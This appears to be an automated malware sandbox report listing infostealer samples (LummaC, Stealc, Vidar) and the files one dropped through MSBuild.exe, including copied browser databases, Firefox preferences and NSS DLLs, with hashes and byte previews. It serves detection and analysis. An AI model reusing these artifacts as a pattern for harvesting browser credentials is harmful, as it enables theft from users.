	E7Bu6a7eve.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Stealc, Vidar	Browse
	cmBxQ7gA5a.exe	Get hash	malicious	Vidar	Browse
	vmgon5Zqja.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\KKFBFCAFCBKF\AFCBFI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\AKKKFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\AKKKFB-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\CAAKFI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\DAECAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	modified
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KKFBFCAFCBKF\DAKJDH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\DHCGID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\EBKKKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\HDBGHI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\HIIIJD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\HIIIJD-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\JEGHJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFBFCAFCBKF\JKFCBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: CR0QGWXdDl.exe, Detection: malicious, Browse Filename: MSCy5UvBYg.exe, Detection: malicious, Browse Filename: E7Bu6a7eve.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: cmBxQ7gA5a.exe, Detection: malicious, Browse Filename: vmgon5Zqja.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: CR0QGWXdDl.exe, Detection: malicious, Browse Filename: MSCy5UvBYg.exe, Detection: malicious, Browse Filename: E7Bu6a7eve.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: cmBxQ7gA5a.exe, Detection: malicious, Browse Filename: vmgon5Zqja.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sql[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
